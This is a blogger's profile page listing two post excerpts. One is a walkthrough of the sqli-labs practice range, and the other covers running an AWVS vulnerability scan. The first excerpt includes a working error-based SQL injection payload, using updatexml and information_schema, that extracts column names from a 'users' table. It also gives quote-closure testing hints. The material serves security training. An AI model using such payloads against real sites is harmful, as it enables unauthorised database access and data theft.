- 博客(2)
- 收藏
- 关注
RSS订阅原创 sqli-labs靶场(1-20)通关手册
id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,32)),1) --+ --------爆出字段名。发现报错如上图,此时我们判断出,闭合方式中含有单引号,我们假设只有单引号,加上or 1=1 --+
2024-07-03 19:08:22
678
原创 AWVS公益测试漏洞扫描
点击“Vulnerabilities”,然后点击某一项,在右侧会显示该漏洞的描述。依次点击“Targets”-“Add Target”,输入Address。其中红色为高危漏洞,黄色为中危漏洞,蓝色为低危漏洞,绿色为无影响。3)选择扫描选项,保持默认,点击“Create Scan”2)保持默认,点击“Scan”进行扫描。4)正在扫描目标网站。
2024-06-20 19:51:28
160
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人